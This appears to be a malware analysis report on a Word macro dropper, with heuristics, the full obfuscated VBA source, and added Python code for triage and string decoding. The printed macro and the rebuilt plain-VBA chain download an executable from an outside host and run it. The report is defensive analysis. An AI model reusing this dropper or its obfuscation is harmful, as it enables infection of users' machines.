Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 81b046c5fc8974e4…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 72.0 KB | Created: 2016-05-09 21:46:00 | Authoring application: Microsoft Office Word | First seen: 2018-09-04
MD5: fdea0fb77ebe8c7e18586e0dc397d780 SHA-1: d863efe5436cb7e8cb648b8d856d865fefa7169b SHA-256: 81b046c5fc8974e4e67ec360bc7a4b8f9a1adf3e70b21838854a18bc55d5f428
Risk score: 330

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 User Execution: Malicious File
  • T1566.001 Phishing: Spearphishing Attachment

The sample contains VBA macros, including a Document_Open handler, so the code runs as soon as the document is opened and macros are enabled. The extracted source instantiates WScript.Shell, ADODB.Stream and MSXML2.ServerXMLHTTP.6.0 through CreateObject, but it never names their members directly: Send, ResponseBody, Type, Write, SaveToFile and Exec are all invoked through CallByName, with the member name rebuilt at run time by stripping a per-string junk alphabet from an obfuscated literal (the PBdoTIA function). A plain string search for 'Exec' or 'SaveToFile' therefore finds nothing, which is why the CallByName and CreateObject heuristics matter more here than the absence of obvious shell commands. Decoding the literals gives a standard download-and-execute chain: an HTTP GET of hxxp://sascua[.]com/system/cache/32f32g[.]exe (decoded from the literal in UhWgqojP), the response body written to %TEMP%/d021166baf.exe via ADODB.Stream, and the file launched with WScript.Shell.Exec. There is no Shell() call in the visible source; execution goes through WScript.Shell.Exec. The ClamAV detection name 'Doc.Dropper.Donoff-5743530-0' is consistent with this dropper behaviour.

Heuristics (10)

  • ClamAV: Doc.Dropper.Donoff-5743530-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Donoff-5743530-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Dim xsgkc As Integer
    Set GyPisf = CreateObject("WScript.Shell")
    End Function
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Dim iefLgDr As Boolean
    Set FLShO = CreateObject("ADODB.Stream")
    End Function
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    Dim VgJNGXss As Integer, kTRGfWEy As Integer
    CIYCZoYhXh = CallByName(MwpidILpwg, jcsrbfdFy, 2)
    End Function
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
    Private Sub Document_Open()
    Dim tHhOFMYobG As Boolean
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body). This is the OOXML DrawingML schema namespace, present in any document that contains drawing content; it is not an indicator of compromise.
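The following is an added example of the kind of static triage that produces findings like the ones listed above. It is my own code, not the analysis engine's, and the finding names, weights and the name-mangling test are my own choices; the sample input is a constructed excerpt of lines copied from the extracted macro further down this page.

```python
"""Static triage of VBA source: auto-exec entry points, CreateObject ProgIDs,
CallByName with a non-literal member name, and a name-mangling ratio.
Added example; finding names and weights are illustrative, not the engine's."""
import re

# Constructed input: a handful of lines copied from the extracted macro.
SAMPLE_VBA = """Private Sub Document_Open()
Dim tHhOFMYobG As Boolean
dOpDT.TcaPnshrwF
End Sub
Public Function CIYCZoYhXh(ByVal MwpidILpwg As Object, ByVal XHCAEVM As String, ByVal jcsrbfdFy As String, ByVal wUxRp As Integer) As Variant
CIYCZoYhXh = CallByName(MwpidILpwg, jcsrbfdFy, 2)
End Function
Public Function GyPisf() As Object
Set GyPisf = CreateObject("WScript.Shell")
End Function
Public Function FLShO() As Object
Set FLShO = CreateObject("ADODB.Stream")
End Function
Public Function hQuVOiES() As Object
Set hQuVOiES = CreateObject("MSXML2.ServerXMLHTTP.6.0")
End Function
"""

AUTOEXEC = {"document_open", "autoopen", "auto_open", "document_close", "autoclose",
            "auto_close", "workbook_open", "workbook_beforeclose"}
# ProgIDs that, taken together, make up a download-and-execute chain.
WATCHED_PROGIDS = {"wscript.shell": "execution", "shell.application": "execution",
                   "adodb.stream": "file write", "msxml2.serverxmlhttp.6.0": "download",
                   "msxml2.xmlhttp": "download", "winhttp.winhttprequest.5.1": "download"}
VBCALLTYPE = {1: "VbMethod", 2: "VbGet", 4: "VbLet", 8: "VbSet"}

PROC_RE = re.compile(r"^[ \t]*(?:Private|Public|Friend)?[ \t]*(?:Static[ \t]+)?(?:Sub|Function)[ \t]+(\w+)", re.M | re.I)
IDENT_RE = re.compile(r"\b(?:Dim|Sub|Function|ByVal|ByRef)[ \t]+(\w+)", re.I)
CREATEOBJ_RE = re.compile(r'CreateObject[ \t]*\([ \t]*"([^"]+)"', re.I)
# Second argument is either a quoted literal or an identifier resolved at run time.
CALLBYNAME_RE = re.compile(r'CallByName[ \t]*\(?[ \t]*(\w+)[ \t]*,[ \t]*("[^"]*"|\w+)[ \t]*,[ \t]*(\d+)', re.I)
VOWELS = set("aeiouAEIOU")


def looks_random(name: str) -> bool:
    """Crude name-mangling test: many case flips between adjacent letters, or a
    long vowel-less run. Ordinary names such as Document_Open pass as normal."""
    flips = sum(1 for a, b in zip(name, name[1:])
                if a.isalpha() and b.isalpha() and a.isupper() != b.isupper())
    longest = run = 0
    for c in name:
        run = 0 if (not c.isalpha() or c in VOWELS) else run + 1
        longest = max(longest, run)
    return len(name) >= 5 and (flips >= 3 or longest >= 5)


def triage_vba(source: str) -> dict:
    """Return the findings and an illustrative score for one VBA source blob."""
    procs = PROC_RE.findall(source)
    autoexec = [p for p in procs if p.lower() in AUTOEXEC]
    progids = CREATEOBJ_RE.findall(source)
    calls = [{"object": o, "member": m.strip('"'), "literal": m.startswith('"'),
              "calltype": VBCALLTYPE.get(int(t), t)} for o, m, t in CALLBYNAME_RE.findall(source)]
    idents = list(dict.fromkeys(IDENT_RE.findall(source)))  # unique, in order of appearance
    mangled = [i for i in idents if looks_random(i)]
    ratio = len(mangled) / len(idents) if idents else 0.0
    roles = {WATCHED_PROGIDS[p.lower()] for p in progids if p.lower() in WATCHED_PROGIDS}
    # Weights are illustrative; the complete chain (trigger + download + write + execute) is the point.
    score = 1 * bool(autoexec) + 2 * len(roles) + 2 * sum(1 for c in calls if not c["literal"]) + 1 * (ratio >= 0.5)
    return {"autoexec": autoexec, "progids": progids, "roles": sorted(roles), "callbyname": calls,
            "identifiers": idents, "mangled": mangled, "mangling_ratio": round(ratio, 2),
            "score": score,
            "chain_complete": bool(autoexec) and {"download", "file write", "execution"} <= roles}


if __name__ == "__main__":
    for key, value in triage_vba(SAMPLE_VBA).items():
        print(f"{key}: {value}")
```

Run it on the output of `olevba --decode` or on macros.bas from a sandbox; the dynamic CallByName finding is the one to act on, because it means the member names a string scanner would look for are not in the source at all.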

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 7822 bytes
SHA-256: 82985b1c7522f789c56ef3288b35c08ab3380cf09d3d4d1928be830394273f45
Detection
ClamAV: No threats found
Obfuscation or payload: likely
143 of 219 identifiers look randomly generated (e.g. 'RxKeNsKpNonKsCeCBKoNxdKy') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Dim tHhOFMYobG As Boolean
dOpDT.TcaPnshrwF
End Sub
Private Sub LYhWGugAVG()
RdzCgNLfo "x3H95rUtaTg2Sx", "j0OlshxnPrJTdNW", False
cdVmY 1519, False, True
End Sub

Attribute VB_Name = "hSMqMmUHxK"
Private Sub fEaAA(ByVal vPPqmsUc As String)
cUAGYTZsVc 1225, 2737, "VJw4Y40vdXH"
eeccmroa 8244
sIezp
qjETUiCBEo 1195, "GBAi4sZhgOF6", "ZqJFlT4l1hOI9"
End Sub
Public Function XzBOMbkAgR(ByVal ZVceD As Integer, ByVal apJduWx As String) As String
Dim lcjLZKp As Boolean
XzBOMbkAgR = Mid(apJduWx, ZVceD, 1)
End Function
Private Sub POoyoRUbzA(ByVal YhYcIcjoZ As String)
yqdpRWtCu
End Sub
Public Function hBvaGDuz(ByVal kwcbSQdwc As String, ByVal IIqnbM As String, ByVal pbxLXzcjXj As String) As Boolean
Dim XctdMEDmXi As String
Dim NybZgGOL As String
hBvaGDuz = InStr(1, pbxLXzcjXj, kwcbSQdwc)
End Function

Attribute VB_Name = "EEFwbzJc"
Public Function CIYCZoYhXh(ByVal MwpidILpwg As Object, ByVal XHCAEVM As String, ByVal jcsrbfdFy As String, ByVal wUxRp As Integer) As Variant
Dim VgJNGXss As Integer, kTRGfWEy As Integer
CIYCZoYhXh = CallByName(MwpidILpwg, jcsrbfdFy, 2)
End Function
Public Sub jbBIHbQgK(ByVal tIlLqGBv As String, ByVal ScnYjwlXy As Variant, ByVal Inmsl As Variant, ByVal YJPSciQgO As Object)
Dim UiomhhzdP As String
CallByName YJPSciQgO, tIlLqGBv, 1, Inmsl, ScnYjwlXy
End Sub
Private Function INLAOnszE() As Boolean
HTXti "ZCG8Io9bvuJndTc"
INLAOnszE = False
End Function
Public Function wvXRehsrG(ByVal TwQoCXtdE As String, ByVal fiZYEpgo As String, ByVal KvQrpPiAb As Object) As Variant
Dim YZpSl As Boolean
Dim cpjereJCH As Boolean
Set wvXRehsrG = CallByName(KvQrpPiAb, fiZYEpgo, 2, TwQoCXtdE)
End Function
Public Sub jJEnbLdZJ(ByVal VQdaUjljZO As Boolean, ByVal DGwqVDSk As String, ByVal kdWgX As Object, ByVal iSwlxPbi As Variant)
Dim ahoVXYaVk As Integer
Dim RTKgzr As Integer
CallByName kdWgX, DGwqVDSk, 1, iSwlxPbi
End Sub
Private Sub uBsiWmu(ByVal svbXnttmX As Boolean)
NvOKlpusE
aVtapbVnl "WwNEeAH4PbZhj", 1093, 9096
End Sub
Private Function PcnRli() As Integer
nCnktKv False
hCCQENhD 3748, 2598, "7gtu1KlkV79dHg"
CGgZkEaFBc
PcnRli = 1258
End Function
Public Sub lSyMgpZNM(ByVal LWyYizpgWQ As Integer, ByVal DaODYiz As String, ByVal aULfFShP As Variant, ByVal UbwdH As String, ByVal lzTGvRj As Object)
CallByName lzTGvRj, DaODYiz, 4, aULfFShP
End Sub
Private Function KAasSxTleR(ByVal aOZZYWW As String) As Boolean
gOZso 1884
KAasSxTleR = True
End Function
Public Sub RbXPvrO(ByVal ubZLajeKsC As Object, ByVal ezIpMrsqrl As String)
Dim MDoAbeuOSu As Integer
Dim VOMlRjtl As Integer
kayWGvM = "ilMrjQX08"
CallByName ubZLajeKsC, ezIpMrsqrl, 1
End Sub

Attribute VB_Name = "ZVECJdWqd"
Public Function PBdoTIA(ByVal DmsIj As String, ByVal XRSqVtkY As String) As String
Dim hNXSdLKx As Boolean
Dim LRVUTxkO As String, IBGFmd As String
For BBfqeRw = 1 To Len(DmsIj)
hNXSdLKx = hSMqMmUHxK.hBvaGDuz(hSMqMmUHxK.XzBOMbkAgR(BBfqeRw, DmsIj), dJutmQPO, XRSqVtkY)
If Not hNXSdLKx Then
XQUKUIlGS = 9746
PBdoTIA = PBdoTIA & hSMqMmUHxK.XzBOMbkAgR(BBfqeRw, DmsIj)
End If
Next
End Function
Private Function dJutmQPO() As String
IkmTucyV = "qzqbqcJFSBkQ"
dJutmQPO = "4UkJLINs48O"
End Function

Attribute VB_Name = "mrwMbne"
Public Function FLShO() As Object
Dim iefLgDr As Boolean
Set FLShO = CreateObject("ADODB.Stream")
End Function
Public Function GyPisf() As Object
Dim xsgkc As Integer
Set GyPisf = CreateObject("WScript.Shell")
End Function
Public Function hQuVOiES() As Object
Dim hMokh As String
Set hQuVOiES = CreateObject("MSXML2.ServerXMLHTTP.6.0")
End Function
Private Function wrqKcnr() As Integer
YRcIVIcog
zzTmoaeZe False, "dDk9r6dkaRSoGhq"
ngYFxDZeTQ False, 7239, "OrfnZtOwLTm"
wrqKcnr = 7668
End Function

Attribute VB_Name = "dOpDT"
Private Function UhWgqojP() As String
qAgGuRAod = 7052
UhWgqojP = ZVECJdWqd.PBdoTIA("hE1t1tSp:S/E/EsS1a1scEuEaS.1ScEoEmS/sEySsEEteSmS1/cSSa1cEhe1S/31E2fSE32ESg.E1exE1e", "ES1")
End Function
Private Sub vFYXRkRUIc(ByVal FTFFXpuE As String)
Dim HGiiZMDxQx As Integer
MDpGo = "2n6iDvJJ5gQ"
EEFwbzJc.jJEnbLdZJ True, GqRYhntjBm, mrwMbne.GyPisf, FTFFXpuE
End Sub
Public Sub TcaPnshrwF()
cKAIKaerq = "dQfCGmXD6uZd7R"
IjkZu
End Sub
Private Function syCnP() As String
syCnP = "0haTYeWJT8d6Vln"
End Function
Private Function WAVGwig() As String
Dim GsLpaL As Integer
WAVGwig = QkQwxQUrJX(ZVECJdWqd.PBdoTIA("eTJEoMPe", "eJo")) & JBRfAkeKg
End Function
Private Function CfXXBsH() As String
CfXXBsH = ZVECJdWqd.PBdoTIA("RxKeNsKpNonKsCeCBKoNxdKy", "NKCx")
End Function
Private Function qeEwZZH() As String
qeEwZZH = "2zZ5VEfUNAsSr"
End Function
Private Sub laCgILS(ByVal BmZaijroi As Integer, ByVal KjNqfm As String, ByVal mDofY As String, ByVal aCGQNGDMOl As String)
Dim YRyDNs As String, ZyPTWCYq As Integer
Set rTaEqRRZo = mrwMbne.hQuVOiES
rTaEqRRZo.Open eAhdcwBlOd, mDofY, False
EEFwbzJc.RbXPvrO rTaEqRRZo, ZVECJdWqd.PBdoTIA("PSeYbndb", "bPY")
fElfKivp False, KjNqfm, "znMj5xsOm2HIZxC", EEFwbzJc.CIYCZoYhXh(rTaEqRRZo, "YxCpNp7qKGfs", CfXXBsH, 1945)
End Sub
Private Function buYBmz() As String
buYBmz = ZVECJdWqd.PBdoTIA("CRlAoRsAAe", "ERNA")
End Function
Private Function SSljFXj() As String
Dim tjTHkpKcA As Integer
SSljFXj = UhWgqojP
End Function
Private Sub qGTBBr()
JPvLzyRGsx 7449
NURQhgJR
bFqvCc False, True, 9563
qjMaTOIxQi
End Sub
Private Function JBRfAkeKg() As String
Dim gUPCu As String
Dim AmmMJkyAk As Integer
JBRfAkeKg = PbHdKfAH
End Function
Private Sub IjkZu()
On Error GoTo oWzkOggyfs
laCgILS 5708, WAVGwig, SSljFXj, qeEwZZH
ieHcrIl = "WtLfeLLInU"
vFYXRkRUIc WAVGwig
Exit Sub
QIGVmfY = "neXlLNt90pWU"
oWzkOggyfs:
End Sub
Private Function PbHdKfAH() As String
IFLCzb = True
PbHdKfAH = ZVECJdWqd.PBdoTIA("j/dgj02kj1g1S66Sjbagrf.Sjexkje", "Sjgkr")
End Function
Private Function PfpjSfzeo(ByVal bAMLQ As Integer, ByVal esHLJ As Boolean) As String
ICxOAIJEjl
JDQNlwwUu
ubsRjN True
PfpjSfzeo = "R7GlmzhN48QP"
End Function
Private Function GuuJgeEbw(ByVal WZeAmBIRY As Boolean) As Boolean
If NACpLN("PljGjzYcgvtUJ", "yDtjd6h7eAT") Then
GbhxArF
Halxgk
End If
nDkOinXoNp
SclaOvXM 3912, False, "jDTQ1gdsz8v"
SFyHb
GuuJgeEbw = False
End Function
Private Sub IijiePOOwa()
aBDhFcyR "vBMJNzqqq3Hi", "npX7H3FaUuwjKF"
End Sub
Private Function eAhdcwBlOd() As String
bwVhN = 9168
eAhdcwBlOd = ZVECJdWqd.PBdoTIA("GHZEjT", "4jZc0H")
End Function
Private Function zQDUtoJEH() As String
zQDUtoJEH = ZVECJdWqd.PBdoTIA("wOpWeinw", "wiW")
End Function
Private Function GqRYhntjBm() As String
mVMPpQPeMQ = 3401
GqRYhntjBm = ZVECJdWqd.PBdoTIA("jE0xe0jc", "jWh60f")
End Function
Private Sub fElfKivp(ByVal VKVWlJjNxy As Boolean, ByVal TfkFwTxiJ As String, ByVal fSNWG As String, ByVal bzeumiS As Variant)
Dim YeWgHtdIb As String
Set NBVHjeQanl = mrwMbne.FLShO
bZfJcN = 978
EEFwbzJc.lSyMgpZNM 654, KVMrUx, 1, syCnP, NBVHjeQanl
EEFwbzJc.RbXPvrO NBVHjeQanl, zQDUtoJEH
EEFwbzJc.jJEnbLdZJ True, ZVECJdWqd.PBdoTIA("Wbr3i0OtOe", "b3O0"), NBVHjeQanl, bzeumiS
EEFwbzJc.jbBIHbQgK ZVECJdWqd.PBdoTIA("hSaGhverTGhoFGrilGeG", "rhG"), 2, TfkFwTxiJ, NBVHjeQanl
EEFwbzJc.RbXPvrO NBVHjeQanl, buYBmz
End Sub
Private Function QkQwxQUrJX(ByVal SRcRG As String) As String
Set pWjJDbAT = EEFwbzJc.wvXRehsrG(ZVECJdWqd.PBdoTIA("rPrROFCr0ErSFS", "r0F"), ZVECJdWqd.PBdoTIA("EWwn vi  ro00n0mwenWtw", "Ww0 "), mrwMbne.GyPisf)
ZcTzOUAO = False
QkQwxQUrJX = pWjJDbAT(SRcRG)
End Function
Private Function KVMrUx() As String
KVMrUx = ZVECJdWqd.PBdoTIA("TPyPlpe1", "1lmPs")
End Function
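The macro above hides every COM member name behind ZVECJdWqd.PBdoTIA, which walks a string literal and drops each character that occurs in a second "junk" string. The following is an added example, my own code and not part of the report or the sample: it re-implements that decoder, runs it over the literal/junk pairs copied from the source above, and rebuilds the call sequence (IjkZu, laCgILS, fElfKivp, vFYXRkRUIc) with the decoded names substituted for the CallByName indirection. The label names in SAMPLE_LITERALS are mine; everything else is taken verbatim from the extracted script.

```python
"""Decoder for the character-strip obfuscation used by the macro's PBdoTIA
function, applied to the literals visible in the extracted source.
Added example, not the sample's or the report's own code."""


def strip_decode(blob: str, junk: str) -> str:
    """Mirror of ZVECJdWqd.PBdoTIA: keep each character of blob that does not
    occur in junk. The macro tests InStr(1, junk, ch) for each Mid(blob, i, 1)
    and appends ch only when the test fails."""
    return "".join(ch for ch in blob if ch not in junk)


# (label, obfuscated literal, junk alphabet) copied from the extracted macro;
# the comment names the function or call site where each literal appears.
SAMPLE_LITERALS = [
    ("url", "hE1t1tSp:S/E/EsS1a1scEuEaS.1ScEoEmS/sEySsEEteSmS1/cSSa1cEhe1S/31E2fSE32ESg.E1exE1e", "ES1"),  # UhWgqojP
    ("env_var", "eTJEoMPe", "eJo"),                          # WAVGwig
    ("env_scope", "rPrROFCr0ErSFS", "r0F"),                  # QkQwxQUrJX, arg 1
    ("env_member", "EWwn vi  ro00n0mwenWtw", "Ww0 "),        # QkQwxQUrJX, arg 2
    ("file_name", "j/dgj02kj1g1S66Sjbagrf.Sjexkje", "Sjgkr"),  # PbHdKfAH
    ("http_verb", "GHZEjT", "4jZc0H"),                       # eAhdcwBlOd
    ("http_send", "PSeYbndb", "bPY"),                        # laCgILS -> RbXPvrO
    ("http_body", "RxKeNsKpNonKsCeCBKoNxdKy", "NKCx"),       # CfXXBsH
    ("stream_type", "TPyPlpe1", "1lmPs"),                    # KVMrUx
    ("stream_open", "wOpWeinw", "wiW"),                      # zQDUtoJEH
    ("stream_write", "Wbr3i0OtOe", "b3O0"),                  # fElfKivp -> jJEnbLdZJ
    ("stream_save", "hSaGhverTGhoFGrilGeG", "rhG"),          # fElfKivp -> jbBIHbQgK
    ("stream_close", "CRlAoRsAAe", "ERNA"),                  # buYBmz
    ("shell_exec", "jE0xe0jc", "jWh60f"),                    # GqRYhntjBm
]


def decode_all(literals=SAMPLE_LITERALS) -> dict:
    """Decode every literal; returns {label: plaintext}."""
    return {label: strip_decode(blob, junk) for label, blob, junk in literals}


def defang(url: str) -> str:
    """Defang a URL for reporting (hxxp, [.]) so it is not clickable."""
    return url.replace("http", "hxxp").replace(".", "[.]")


def reconstruct_chain(d: dict) -> list:
    """Rebuild IjkZu -> laCgILS -> fElfKivp -> vFYXRkRUIc as plain VBA with the
    decoded member names in place of the CallByName indirection. CallByName's
    third argument is the VbCallType: 1 VbMethod, 2 VbGet, 4 VbLet."""
    # WAVGwig = WScript.Shell.Environment("PROCESS")("TEMP") & PbHdKfAH
    path = f'%{d["env_var"]}%{d["file_name"]}'
    return [
        'Set http = CreateObject("MSXML2.ServerXMLHTTP.6.0")',            # mrwMbne.hQuVOiES
        f'http.Open "{d["http_verb"]}", "{d["url"]}", False',            # direct call in laCgILS
        f'http.{d["http_send"]}',                                        # CallByName ..., 1 (VbMethod)
        'Set stm = CreateObject("ADODB.Stream")',                        # mrwMbne.FLShO
        f'stm.{d["stream_type"]} = 1',                                   # CallByName ..., 4 (VbLet): adTypeBinary
        f'stm.{d["stream_open"]}',                                       # CallByName ..., 1
        f'stm.{d["stream_write"]} http.{d["http_body"]}',                # body fetched via CallByName ..., 2 (VbGet)
        f'stm.{d["stream_save"]} "{path}", 2',                           # 2 = adSaveCreateOverWrite
        f'stm.{d["stream_close"]}',                                      # CallByName ..., 1
        f'CreateObject("WScript.Shell").{d["shell_exec"]} "{path}"',     # vFYXRkRUIc via mrwMbne.GyPisf
    ]


if __name__ == "__main__":
    decoded = decode_all()
    for label, value in decoded.items():
        print(f"{label:13s} {defang(value) if label == 'url' else value}")
    print()
    print("\n".join(reconstruct_chain(decoded)))
```

Every PBdoTIA call site in the source has its own junk alphabet, so the decoder has to be run per pair rather than with one global key; the same routine can be reused as-is on other samples from this family by swapping the literal list. Report the decoded URL only in defanged form.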